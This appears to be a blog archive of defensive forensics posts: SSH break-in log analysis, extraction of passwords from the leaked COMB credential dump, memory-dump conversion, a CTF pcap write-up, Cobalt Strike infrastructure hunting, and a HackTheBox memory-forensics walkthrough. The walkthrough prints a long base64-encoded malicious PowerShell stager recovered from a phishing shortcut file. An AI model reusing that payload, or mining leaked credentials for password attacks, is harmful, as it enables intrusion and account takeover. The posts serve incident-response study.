Tag Archives: analysis

Break-In Analyzer – Quickly analyze auth.log, secure, utmp & wtmp logs for possible SSH break-in attempts

Recently, I encountered incident where several hosts been infected by < █████████ >. So, to investigate this incident, we received bunch of logs to be analyze; mostly Linux related logs.

I’ve been thinking.. What if the host has been successfully brute-forced? How can we identify it?

In Linux, there are several logs that we can refer that contains authentication logs for both successful or failed logins, and authentication processes. Location & names of the logs varies; depending on system type. For Debian/Ubuntu, the logs located at /var/log/auth.log. For Redhat/CentOS, the logs located at /var/log/secure.

There are 2 more logs that we can refer;
/var/log/utmp: current login state by user.
/var/log/wtmp: record of each user login/logout.

So, what if we write a script to quickly go thru those mentioned logs & identify the culprits? Probably we can find out if our host has been successfully brute-forced.

Introducing.. Break-In AnalyzerA script that analyze the log files /var/log/auth.log (for Debian based systems), /var/log/secure (for RHEL based systems), utmp/wtmp for possible SSH break-in attempts. – https://github.com/zam89/Break-In-Analyzer

Here are some screenshot of the script in action:

Analyzing auth.log
Analyzing secure logs
Dumping & Analyzing wtmp files

The output result will be written into text file; stored into folder named output. Inside the folder will contains file named:
auth_output.log
secure_output.log
utmp_output.log
wtmp_output.log

So, you must been wondering; how can I validate these IPs? whether they are harmless or not? Well, to do that, we can use AbuseIPDB to quickly see each of IP reputation; either they’re clean or has been reported due to malicious activity.

In this example, I’m using AbuseIPDB Bulk Checker from – https://github.com/AdmiralSYN-ACKbar/bulkcheck. This tool can perform bulk checking of IPs towards AbuseIPDB website. *Just a side notes: it require API key from AbuseIPDb. You can get it for free by registering on the website. Its limited to 1000 request/IPs per day.

So, I’m checking 203 IPs that we got from Break-In Analyzer script output (after removing duplicated using Excels) on AbuseIPDB if there is any records for those IPs. After the check completed, the result shows something like this:

AbuseIPDB Bulk Checker result

If you filter out by abuseConfidenceScore (removing score 0), you’ll see there are 3 IPs that having kinda high confidence score. The higher the score, the more chances the IP marked as malicious – meaning that the IP has been reported multiple times related to malicious activities.

Next, we cross check with our Break-In Analyzer outputs to see where did these IPs located on the logs. Or you can cross check directly with your logs. To do that, run command as below:

$ grep --perl-regexp "110.93.200.118" --color=always --only-matching --recursive * | sort | uniq --count | sort --numeric --reverse

This command is basically searching where the IP “110.93.200.118” located/contains inside the log. If you run the command, you’ll see output as below:

Now we know that the IP “110.93.200.118” is contains inside wtmp dump log:
– node2/output/wtmpdump_output.txt
– node1/output/wtmpdump_output.txt

and also inside tools output:
– node2/output/output_node2.txt
– node1/output/output_node1.txt

If we go search inside the wtmp dump log for that IP “110.93.200.118“, we found that the IP has been accessing the system since Feb 2016… hmm.. 🤦

cat node2/output/wtmpdump_output.txt | grep 110.93.200.118 --color=always

This may indicate that the attacker has been leveraging the host for very long time.

Next step is probably to search what the IP or the account “portaladmin-ts” is doing inside the host.

Extracting password from data leaks dump files

Recently I’ve read about this data leak; COMB: largest breach of all time leaked online with 3.2 billion records.

According to the article, it was known as “Compilation of Many Breaches” (COMB). This data was leaked on a popular hacking forum. It contains billions of user credentials from past leaks from Netflix, LinkedIn, Exploit.in, Bitcoin and more. This leak contains email and password pairs.

Inside the data dump, it was structured something like this:

CompilationOfManyBreaches
  folderdata
    folder1
       file0
       file1
    folder2
       file0
       file1

The file contains something like this:

Which indicated as email:password

So I’m wondered… What if we extract either email or password only from all those files? We can maybe create a password list from that. Or we can analyze the password trend. See what’s the top password being used & stuff.

So… We’re not going thru all hundreds of files which total up 100GB+ to extract the password manually… That’s crazy ma man!

To make it easier, I’ve created a Python script to extract the password from all dump file recursively. The code as below:

#!/usr/bin/env python
import os
from timeit import default_timer as timer
from datetime import timedelta

inputfile = "/Desktop/test/data" #change this to your dump files locations

outputfile = open("extracted_password.txt", "w")

print("\nStart extracting...")
start = timer()

for path, dirs, files in os.walk(inputfile):
    for filename in files:
        fullpath = os.path.join(path, filename)
        with open(fullpath, "r") as f:
            #print(f.read())
            for line in f:
                email, password, *rest = line.split(":")
                outputfile.write("%s" % password)
                #print(password, end='')

outputfile.close()

print("Finish!\n")
end = timer()
print("Time Taken: ", end='')
print(timedelta(seconds=end-start))

Save the code above & run the script:

$ python password_extractor.py

It may takes some times depending on your hardware resources and dump file size. You should see output something like this after the script completed execution:

When completed, you should see a new file named “extracted_password.txt” being created. Inside it contains all the password from all dump file; consolidated into 1 single big ass file.

Now we can start analyzing the password pattern. We can use this command below to see what’s the top 10 password:

$ time sort extracted_password.txt | uniq -c | sort -bgr | head -10

Happy hunting & analyzing! 🙂

Generate Memory Dump from .vmss file using vmss2core

Previously, I’ve encountered a problem where I’m unable to copy the .vmem file for further analysis.

So, the next alternative way that we can do is to use .vmss file & convert it into .vmem file. .vmss is a Virtual machine suspend file.

To start convert it, first you need to download vmss2core tool here – https://flings.vmware.com/vmss2core

Next, open your cmd and enter cmd as below:

F:\Tools> .\vmss2core-sb-8456865.exe -W 'F:\INC\<REDACTED>\<REDACTED>.vmss'
vmss2core version 8456865 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
region[0]: start=0 end=c0000000.
region[1]: start=100000000 end=240000000.
Cannot translate linear address 0.
... 10 MBs written.
... 20 MBs written.
<snip>
... 8180 MBs written.
... 8190 MBs written.
Finished writing core.

After it finished, it will create a file named memory.vmem.

There you have it. So you can start doing your memory analysis using volatility if you want.

For example, here we’ll be using volatility in order to find out the profile for which .vmem is created.

$ python vol.py -f memory.dmp imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : VirtualBoxCoreDumpElf64 (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/home/memory.dmp)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800028530a0L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002854d00L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2019-12-23 17:42:50 UTC+0000
     Image local date and time : 2019-12-23 11:42:50 -0600

Global Community CTF: Mini Bootup by SANS – NM01

Question:

We have captured a file being transferred over the network, can you take a look and see if you can find anything useful?

https://cgames-files.allyourbases.co/nm01.zip

Hint: External tools like CyberChef can help decode the data.

Download & extract the file. You’ll see named “nm01.pcapng

Open the pcap file using Wireshark. Usually, I sort frame with large “Length” number and view the content.

On Frame 4 – right click – click “Follow” – click “TCP stream”

Todays file password is: SecurePa55word8!

hmm.. this “SecurePa55word8!” seems interesting. I tried to submit it as flag, but it says wrong..

So, I viewed another large frame, on Frame 26. I saw there’s string “7z“. I thought, it could be a 7z file. I took the hex number; “37 7a” & search on Google. Based on this site – https://www.filesignatures.net/index.php?page=search&search=377ABCAF271C&mode=SIG, it is confirm that this is indeed a 7z file.

notice the range that I highlighted.

So, on the same frame 26, right click and follow TCP stream. It will show you the stream/content of it. At bottom of the stream, on options “Show and save data as“, change it to “Raw”.

Click “Save as…” and save it as name you like – in this example, I’ll name it as “7out“.

When I open the file, there’s folder named “FLAG” and inside it contain file named “Flag.txt”. It’s password protected when we tried to view it.

got password?

So, maybe we can use the string/password that we discover earlier:

It works! The flag is “capturing_clouds_and_keys” .

Hunting for possible attacker Cobalt-Strike infra

Recently, we have an incident where suspicious traffic was observed related to external C2. Initial finding found that this IP 172.241.27.17 (172.241.24.0/21) resolved to
atakai[-]technologies[.]host; according to pDNS in Virustotal [1].

So, further digging on this IP found it has port 50050 open. Based on Recorded Future threat analysis report & Cobalt Strike Team Server Population Study, it mentioned that default port for Cobalt Strike controller is on port 50050.

So, I asked to myself. What if the neighboring IPs were also been setup for Cobalt Strike infrastructure? So I decided to go on this journey…

First, we know that the IP range is 172.241.24.0/21. By using this tool, we can convert CIDR notation to a range of IP addresses.

The result, we have 2048 addresses; IP address range between 172.241.24.0-172.241.31.255.

Next, we using online tool named Reverse IP & DNS API from WhoisXML API. Function of this tools is to reveals all domains that share an IP address. Example as below:

To use this tools, we need to buy credit to leverage its API. As for free account, you only have 100 credit to be use on Domain Research Suite tools. But on this case, we need around 2050 credit. Based on their website, 1000 DRS credits = $19.00. So.. yeah..

After you have enough credit, you can use the script as below:

#!/bin/bash

url="https://reverse-ip.whoisxmlapi.com/api/v1?apiKey=whoisxml_apikey&ip="

for i in $(cat ip.txt); do
	content="$(curl -s "$url$i")"
	echo "$content" >> output.txt
done

Remember to put your API key into the script. It will basically produce result into “output.txt“.

After that, import you result into Excel. Then, we sort and select possible domains from the output based on domain naming convention; e.g. atakai, amatai, amamai:

Now we have possible suspected IPs & domains. To further digging, we’ll leverage Shodan.io to see what are the open port available for those IPs.

To use it, we’ll using script as below:

$ curl -s https://api.shodan.io/shodan/host/{172.241.27.17,172.241.27.44,172.241.27.62,172.241.27.65,172.241.27.66,172.241.27.68,172.241.27.72,172.241.27.225,172.241.29.155,172.241.29.156,172.241.29.157}?key=shodan_apikey | jq -r '. | "IP: \(.ip_str) Ports: \(.ports)"'

The output should be like this:

Now we know 7/11 (no pun intended) IPs been observed by Shodan having port 50050 opened. This indicate that this set of IPs possibly used part of Cobalt Strike infra.

Next step is we can search for date registration for each domain from Whois data. But I’m too lazy to continue this. Also I’ve encountered where several Whois provider giving different info regarding of domain registration date. So yeah, maybe I’ll update next time when I’m free 😉

HackTheBox.eu – Reminiscent (Forensics 40 points)

Reminiscent - Forensic question
Reminiscent [by rotarydrone]

For this question, I use Volatility to solve it. You can try to use Volatility Workbench. For me, it seems like not working properly (or I’m just too noob to use it).

First, download the file reminiscent.zip from the site. Extract it. You should see file named:

  • flounder-pc-memdump.elf
  • imageinfo.txt
  • Resume.eml

If you open the email file “Resume.eml“, you’ll find it contain a link “resume.zip“.

Based on clue/hint given:

Our recruiter mentioned he received an email from someone regarding their resume.

So maybe the recruiter opened the attachment from the email and something malicious happened.

To start analyzing this incident, we can use Volatility & dig further using the memdump “flounder-pc-memdump.elf“.

Usually, when I start doing memory forensic, I will try to determine which profile suitable to be used. To start with, run this command:

python vol.py -f flounder-pc-memdump.elf imageinfo

If thing goes correctly, you should see something like this:

So we’ll be using profile “Win7SP1x64_23418” for our investigation.

Next, we’ll try to see what were the running processes using “pstree“. This plugin used to display the processes and their parent processes. Run command as below:

python vol.py -f flounder-pc-memdump.elf --profile=Win7SP1x64_23418 pstree

You should see as below:

From this process list, we can see couple of suspicious process; e.g. Thunderbird (free email application) spawning powershell? hmm..

Also remember our recruiter mentioned that he received email from someone? So maybe the recruiter is using Thunderbird to open that email; which he accidentally opened the attachment.

So we lets see if the recruiter host machine contains file named “resume“:

python vol.py -f flounder-pc-memdump.elf --profile=Win7SP1x64_23418 filescan | grep -i resume

Now we know that on recruiter machine contains file name “resume.pdf.lnk“. LNK files are usually seen by users as shortcuts, and used in places like the Desktop and Start Menu.

Lets dump those 2 .lnk file for us to further investigate:

python vol.py -f flounder-pc-memdump.elf --profile=Win7SP1x64_23418 dumpfiles -n -i -r \\.lnk --dump-dir=reminiscent_output

You should see 2 file inside output folder.

Let’s see what’s inside that 2 file:

strings file.496.0xfffffa80017dcc60.resume.pdf.lnk.vacb

As you can see, it contains some base64 strings at below. Let’s analyze those base64 strings.

cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAFAAIAAtAHMAdABhACAALQB3ACAAMQAgAC0AZQBuAGMAIAAgAEoAQQBCAEgAQQBIAEkAQQBiAHcAQgBWAEEARgBBAEEAVQBBAEIAUABBAEUAdwBBAGEAUQBCAEQAQQBGAGsAQQBVAHcAQgBGAEEASABRAEEAZABBAEIASgBBAEUANABBAFIAdwBCAHoAQQBDAEEAQQBQAFEAQQBnAEEARgBzAEEAYwBnAEIARgBBAEUAWQBBAFgAUQBBAHUAQQBFAEUAQQBVAHcAQgB6AEEARwBVAEEAVABRAEIAQwBBAEUAdwBBAFcAUQBBAHUAQQBFAGMAQQBSAFEAQgAwAEEARgBRAEEAZQBRAEIAdwBBAEUAVQBBAEsAQQBBAG4AQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFQAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBFAEUAQQBkAFEAQgAwAEEARwA4AEEAYgBRAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgBWAEEASABRAEEAYQBRAEIAcwBBAEgATQBBAEoAdwBBAHAAQQBDADQAQQBJAGcAQgBIAEEARQBVAEEAZABBAEIARwBBAEUAawBBAFIAUQBCAGcAQQBHAHcAQQBaAEEAQQBpAEEAQwBnAEEASgB3AEIAagBBAEcARQBBAFkAdwBCAG8AQQBHAFUAQQBaAEEAQgBIAEEASABJAEEAYgB3AEIAMQBBAEgAQQBBAFUAQQBCAHYAQQBHAHcAQQBhAFEAQgBqAEEASABrAEEAVQB3AEIAbABBAEgAUQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQgB6AEEAQwBjAEEATABBAEEAZwBBAEMAYwBBAFQAZwBBAG4AQQBDAHMAQQBKAHcAQgB2AEEARwA0AEEAVQBBAEIAMQBBAEcASQBBAGIAQQBCAHAAQQBHAE0AQQBMAEEAQgBUAEEASABRAEEAWQBRAEIAMABBAEcAawBBAFkAdwBBAG4AQQBDAGsAQQBMAGcAQgBIAEEARQBVAEEAVgBBAEIAVwBBAEcARQBBAGIAQQBCAFYAQQBHAFUAQQBLAEEAQQBrAEEARwA0AEEAZABRAEIAcwBBAEUAdwBBAEsAUQBBADcAQQBDAFEAQQBSAHcAQgBTAEEARwA4AEEAZABRAEIAUQBBAEYAQQBBAFQAdwBCAHMAQQBFAGsAQQBRAHcAQgA1AEEARgBNAEEAWgBRAEIAVQBBAEYAUQBBAGEAUQBCAE8AQQBHAGMAQQBVAHcAQgBiAEEAQwBjAEEAVQB3AEIAagBBAEgASQBBAGEAUQBCAHcAQQBIAFEAQQBRAGcAQQBuAEEAQwBzAEEASgB3AEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAHcAQQBiAHcAQgBuAEEARwBjAEEAYQBRAEIAdQBBAEcAYwBBAEoAdwBCAGQAQQBGAHMAQQBKAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBCAFQAQQBHAE0AQQBjAGcAQgBwAEEASABBAEEAZABBAEIAQwBBAEMAYwBBAEsAdwBBAG4AQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAVABBAEIAdgBBAEcAYwBBAFoAdwBCAHAAQQBHADQAQQBaAHcAQQBuAEEARgAwAEEASQBBAEEAOQBBAEMAQQBBAE0AQQBBADcAQQBDAFEAQQBSAHcAQgBTAEEARwA4AEEAZABRAEIAUQBBAEYAQQBBAFQAdwBCAE0AQQBFAGsAQQBRAHcAQgBaAEEARgBNAEEAUgBRAEIAMABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBVAHcAQgBiAEEAQwBjAEEAVQB3AEIAagBBAEgASQBBAGEAUQBCAHcAQQBIAFEAQQBRAGcAQQBuAEEAQwBzAEEASgB3AEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAHcAQQBiAHcAQgBuAEEARwBjAEEAYQBRAEIAdQBBAEcAYwBBAEoAdwBCAGQAQQBGAHMAQQBKAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBCAFQAQQBHAE0AQQBjAGcAQgBwAEEASABBAEEAZABBAEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBNAEEARwA4AEEAWgB3AEIAbgBBAEcAawBBAGIAZwBCAG4AQQBDAGMAQQBYAFEAQQBnAEEARAAwAEEASQBBAEEAdwBBAEQAcwBBAFcAdwBCAFMAQQBHAFUAQQBaAGcAQgBkAEEAQwA0AEEAUQBRAEIAegBBAEYATQBBAFoAUQBCAHQAQQBFAEkAQQBiAEEAQgA1AEEAQwA0AEEAUgB3AEIAbABBAEYAUQBBAFYAQQBCADUAQQBGAEEAQQBSAFEAQQBvAEEAQwBjAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADAAQQBMAGcAQgBOAEEARwBFAEEAYgBnAEIAaABBAEcAYwBBAFoAUQBCAHQAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAUQBRAEIAMQBBAEgAUQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEUARQBBAGIAUQBCAHoAQQBHAGsAQQBWAFEAQgAwAEEARwBrAEEAYgBBAEIAegBBAEMAYwBBAEsAUQBCADgAQQBEADgAQQBlAHcAQQBrAEEARgA4AEEAZgBRAEIAOABBAEMAVQBBAGUAdwBBAGsAQQBGADgAQQBMAGcAQgBIAEEARQBVAEEAZABBAEIARwBBAEcAawBBAFoAUQBCAE0AQQBHAFEAQQBLAEEAQQBuAEEARwBFAEEAYgBRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBHAGsAQQBkAEEAQgBHAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAG4AQQBDAHcAQQBKAHcAQgBPAEEARwA4AEEAYgBnAEIAUQBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBzAEEARgBNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAGMAQQBLAFEAQQB1AEEARgBNAEEAUgBRAEIAVQBBAEYAWQBBAFkAUQBCAE0AQQBIAFUAQQBSAFEAQQBvAEEAQwBRAEEAVABnAEIAMQBBAEcAdwBBAFQAQQBBAHMAQQBDAFEAQQBWAEEAQgB5AEEASABVAEEAWgBRAEEAcABBAEgAMABBAE8AdwBCAGIAQQBGAE0AQQBlAFEAQgB6AEEARgBRAEEAWgBRAEIAdABBAEMANABBAFQAZwBCAGwAQQBGAFEAQQBMAGcAQgBUAEEARQBVAEEAYwBnAEIAVwBBAEUAawBBAFkAdwBCAGwAQQBGAEEAQQBUAHcAQgBKAEEARwA0AEEAZABBAEIATgBBAEUARQBBAGIAZwBCAEIAQQBHAGMAQQBSAFEAQgBTAEEARgAwAEEATwBnAEEANgBBAEUAVQBBAGUAQQBCAHcAQQBFAFUAQQBZAHcAQgAwAEEARABFAEEATQBBAEEAdwBBAEUATQBBAFQAdwBCAHUAQQBGAFEAQQBhAFEAQgB1AEEASABVAEEAUgBRAEEAOQBBAEQAQQBBAE8AdwBBAGsAQQBGAGMAQQBRAHcAQQA5AEEARQA0AEEAUgBRAEIAWABBAEMAMABBAFQAdwBCAEMAQQBHAG8AQQBSAFEAQgBqAEEARgBRAEEASQBBAEIAVABBAEgAawBBAGMAdwBCAFUAQQBFAFUAQQBUAFEAQQB1AEEARQA0AEEAUgBRAEIAMABBAEMANABBAFYAdwBCAGwAQQBFAEkAQQBRAHcAQgBzAEEARQBrAEEAUgBRAEIAdQBBAEgAUQBBAE8AdwBBAGsAQQBIAFUAQQBQAFEAQQBuAEEARQAwAEEAYgB3AEIANgBBAEcAawBBAGIAQQBCAHMAQQBHAEUAQQBMAHcAQQAxAEEAQwA0AEEATQBBAEEAZwBBAEMAZwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEEAZwBBAEUANABBAFYAQQBBAGcAQQBEAFkAQQBMAGcAQQB4AEEARABzAEEASQBBAEIAWABBAEUAOABBAFYAdwBBADIAQQBEAFEAQQBPAHcAQQBnAEEARgBRAEEAYwBnAEIAcABBAEcAUQBBAFoAUQBCAHUAQQBIAFEAQQBMAHcAQQAzAEEAQwA0AEEATQBBAEEANwBBAEMAQQBBAGMAZwBCADIAQQBEAG8AQQBNAFEAQQB4AEEAQwA0AEEATQBBAEEAcABBAEMAQQBBAGIAQQBCAHAAQQBHAHMAQQBaAFEAQQBnAEEARQBjAEEAWgBRAEIAagBBAEcAcwBBAGIAdwBBAG4AQQBEAHMAQQBKAEEAQgAzAEEARQBNAEEATABnAEIASQBBAEcAVQBBAFkAUQBCAEUAQQBHAFUAQQBjAGcAQgBUAEEAQwA0AEEAUQBRAEIAawBBAEcAUQBBAEsAQQBBAG4AQQBGAFUAQQBjAHcAQgBsAEEASABJAEEATABRAEIAQgBBAEcAYwBBAFoAUQBCAHUAQQBIAFEAQQBKAHcAQQBzAEEAQwBRAEEAZABRAEEAcABBAEQAcwBBAEoAQQBCAFgAQQBHAE0AQQBMAGcAQgBRAEEARgBJAEEAYgB3AEIAWQBBAEgAawBBAFAAUQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEARgBRAEEAWgBRAEIATgBBAEMANABBAFQAZwBCAEYAQQBGAFEAQQBMAGcAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBCADEAQQBFAFUAQQBjAHcAQgAwAEEARgAwAEEATwBnAEEANgBBAEUAUQBBAFoAUQBCAG0AQQBHAEUAQQBWAFEAQgBNAEEASABRAEEAVgB3AEIAbABBAEUASQBBAFUAQQBCAFMAQQBFADgAQQBXAEEAQgBaAEEARABzAEEASgBBAEIAMwBBAEUATQBBAEwAZwBCAFEAQQBGAEkAQQBiAHcAQgBZAEEARgBrAEEATABnAEIARABBAEYASQBBAFIAUQBCAEUAQQBHAFUAQQBUAGcAQgAwAEEARQBrAEEAWQBRAEIATQBBAEYATQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARgBrAEEAVQB3AEIAVQBBAEcAVQBBAFQAUQBBAHUAQQBFADQAQQBSAFEAQgBVAEEAQwA0AEEAUQB3AEIAeQBBAEcAVQBBAFIAQQBCAEYAQQBHADQAQQBWAEEAQgBwAEEARwBFAEEAVABBAEIARABBAEcARQBBAFEAdwBCAG8AQQBHAFUAQQBYAFEAQQA2AEEARABvAEEAUgBBAEIAbABBAEUAWQBBAFkAUQBCADEAQQBFAHcAQQBWAEEAQgBPAEEARQBVAEEAZABBAEIAMwBBAEUAOABBAGMAZwBCAHIAQQBFAE0AQQBjAGcAQgBsAEEARwBRAEEAWgBRAEIAdQBBAEgAUQBBAGEAUQBCAEIAQQBHAHcAQQBVAHcAQQA3AEEAQwBRAEEAUwB3AEEAOQBBAEYAcwBBAFUAdwBCAFoAQQBGAE0AQQBkAEEAQgBGAEEARQAwAEEATABnAEIAVQBBAEcAVQBBAGUAQQBCADAAQQBDADQAQQBSAFEAQgBPAEEARQBNAEEAVAB3AEIARQBBAEUAawBBAGIAZwBCAG4AQQBGADAAQQBPAGcAQQA2AEEARQBFAEEAVQB3AEIARABBAEUAawBBAFMAUQBBAHUAQQBFAGMAQQBSAFEAQgAwAEEARQBJAEEAZQBRAEIAMABBAEUAVQBBAGMAdwBBAG8AQQBDAGMAQQBSAFEAQQB4AEEARwBjAEEAVABRAEIASABBAEcAUQBBAFoAZwBCAFUAQQBFAEEAQQBaAFEAQgB2AEEARQA0AEEAUABnAEIANABBAEQAawBBAGUAdwBCAGQAQQBEAEkAQQBSAGcAQQAzAEEAQwBzAEEAWQBnAEIAegBBAEUAOABBAGIAZwBBADAAQQBDADgAQQBVAHcAQgBwAEEARgBFAEEAYwBnAEIAMwBBAEMAYwBBAEsAUQBBADcAQQBDAFEAQQBVAGcAQQA5AEEASABzAEEASgBBAEIARQBBAEMAdwBBAEoAQQBCAEwAQQBEADAAQQBKAEEAQgBCAEEASABJAEEAWgB3AEIAVABBAEQAcwBBAEoAQQBCAFQAQQBEADAAQQBNAEEAQQB1AEEAQwA0AEEATQBnAEEAMQBBAEQAVQBBAE8AdwBBAHcAQQBDADQAQQBMAGcAQQB5AEEARABVAEEATgBRAEIAOABBAEMAVQBBAGUAdwBBAGsAQQBFAG8AQQBQAFEAQQBvAEEAQwBRAEEAUwBnAEEAcgBBAEMAUQBBAFUAdwBCAGIAQQBDAFEAQQBYAHcAQgBkAEEAQwBzAEEASgBBAEIATABBAEYAcwBBAEoAQQBCAGYAQQBDAFUAQQBKAEEAQgBMAEEAQwA0AEEAUQB3AEIAdgBBAEgAVQBBAGIAZwBCAFUAQQBGADAAQQBLAFEAQQBsAEEARABJAEEATgBRAEEAMgBBAEQAcwBBAEoAQQBCAFQAQQBGAHMAQQBKAEEAQgBmAEEARgAwAEEATABBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAG8AQQBYAFEAQQA5AEEAQwBRAEEAVQB3AEIAYgBBAEMAUQBBAFMAZwBCAGQAQQBDAHcAQQBKAEEAQgBUAEEARgBzAEEASgBBAEIAZgBBAEYAMABBAGYAUQBBADcAQQBDAFEAQQBSAEEAQgA4AEEAQwBVAEEAZQB3AEEAawBBAEUAawBBAFAAUQBBAG8AQQBDAFEAQQBTAFEAQQByAEEARABFAEEASwBRAEEAbABBAEQASQBBAE4AUQBBADIAQQBEAHMAQQBKAEEAQgBJAEEARAAwAEEASwBBAEEAawBBAEUAZwBBAEsAdwBBAGsAQQBGAE0AQQBXAHcAQQBrAEEARQBrAEEAWABRAEEAcABBAEMAVQBBAE0AZwBBADEAQQBEAFkAQQBPAHcAQQBrAEEARgBNAEEAVwB3AEEAawBBAEUAawBBAFgAUQBBAHMAQQBDAFEAQQBVAHcAQgBiAEEAQwBRAEEAUwBBAEIAZABBAEQAMABBAEoAQQBCAFQAQQBGAHMAQQBKAEEAQgBJAEEARgAwAEEATABBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAGsAQQBYAFEAQQA3AEEAQwBRAEEAWAB3AEEAdABBAEcASQBBAGUAQQBCAHYAQQBGAEkAQQBKAEEAQgBUAEEARgBzAEEASwBBAEEAawBBAEYATQBBAFcAdwBBAGsAQQBFAGsAQQBYAFEAQQByAEEAQwBRAEEAVQB3AEIAYgBBAEMAUQBBAFMAQQBCAGQAQQBDAGsAQQBKAFEAQQB5AEEARABVAEEATgBnAEIAZABBAEgAMABBAGYAUQBBADcAQQBDAFEAQQBkAHcAQgBqAEEAQwA0AEEAUwBBAEIARgBBAEUARQBBAFoAQQBCAEYAQQBIAEkAQQBjAHcAQQB1AEEARQBFAEEAUgBBAEIARQBBAEMAZwBBAEkAZwBCAEQAQQBHADgAQQBiAHcAQgByAEEARwBrAEEAWgBRAEEAaQBBAEMAdwBBAEkAZwBCAHoAQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEQAMABBAFQAUQBCAEQAQQBHAEUAQQBhAEEAQgAxAEEARgBFAEEAVgBnAEIAbQBBAEgAbwBBAE0AQQBCADUAQQBFADAAQQBOAGcAQgBXAEEARQBJAEEAWgBRAEEANABBAEcAWQBBAGUAZwBCAFcAQQBEAGsAQQBkAEEAQQA1AEEARwBvAEEAYgB3AEIAdABBAEcAOABBAFAAUQBBAGkAQQBDAGsAQQBPAHcAQQBrAEEASABNAEEAWgBRAEIAeQBBAEQAMABBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AQQBBAHUAQQBEAEUAQQBNAEEAQQB1AEEARABrAEEATwBRAEEAdQBBAEQAVQBBAE4AUQBBADYAQQBEAGcAQQBNAEEAQQBuAEEARABzAEEASgBBAEIAMABBAEQAMABBAEoAdwBBAHYAQQBHAHcAQQBiAHcAQgBuAEEARwBrAEEAYgBnAEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAE0AQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAZwBBAGMAQQBBAG4AQQBEAHMAQQBKAEEAQgBtAEEARwB3AEEAWQBRAEIAbgBBAEQAMABBAEoAdwBCAEkAQQBGAFEAQQBRAGcAQgA3AEEAQwBRAEEAWAB3AEIAcQBBAEQAQQBBAFIAdwBCAGYAQQBIAGsAQQBNAEEAQgAxAEEARgBJAEEAWAB3AEIATgBBAEQATQBBAGIAUQBBAHcAQQBIAEkAQQBXAFEAQgBmAEEAQwBRAEEAZgBRAEEAbgBBAEQAcwBBAEoAQQBCAEUAQQBHAEUAQQBkAEEAQgBCAEEARAAwAEEASgBBAEIAWABBAEUATQBBAEwAZwBCAEUAQQBHADgAQQBWAHcAQgBPAEEARQB3AEEAYgB3AEIAaABBAEUAUQBBAFIAQQBCAEIAQQBGAFEAQQBRAFEAQQBvAEEAQwBRAEEAVQB3AEIAbABBAEYASQBBAEsAdwBBAGsAQQBIAFEAQQBLAFEAQQA3AEEAQwBRAEEAYQBRAEIAMgBBAEQAMABBAEoAQQBCAGsAQQBHAEUAQQBWAEEAQgBCAEEARgBzAEEATQBBAEEAdQBBAEMANABBAE0AdwBCAGQAQQBEAHMAQQBKAEEAQgBFAEEARQBFAEEAZABBAEIAaABBAEQAMABBAEoAQQBCAEUAQQBHAEUAQQBWAEEAQgBoAEEARgBzAEEATgBBAEEAdQBBAEMANABBAEoAQQBCAEUAQQBFAEUAQQBkAEEAQgBoAEEAQwA0AEEAVABBAEIAbABBAEcANABBAFIAdwBCAFUAQQBFAGcAQQBYAFEAQQA3AEEAQwAwAEEAUwBnAEIAUABBAEUAawBBAFQAZwBCAGIAQQBFAE0AQQBTAEEAQgBCAEEASABJAEEAVwB3AEIAZABBAEYAMABBAEsAQQBBAG0AQQBDAEEAQQBKAEEAQgBTAEEAQwBBAEEASgBBAEIAawBBAEcARQBBAGQAQQBCAEIAQQBDAEEAQQBLAEEAQQBrAEEARQBrAEEAVgBnAEEAcgBBAEMAUQBBAFMAdwBBAHAAQQBDAGsAQQBmAEEAQgBKAEEARQBVAEEAVwBBAEEAPQA=

By using Cyberchef, the base64 strings appear to be another Powershell base64 encoded command:

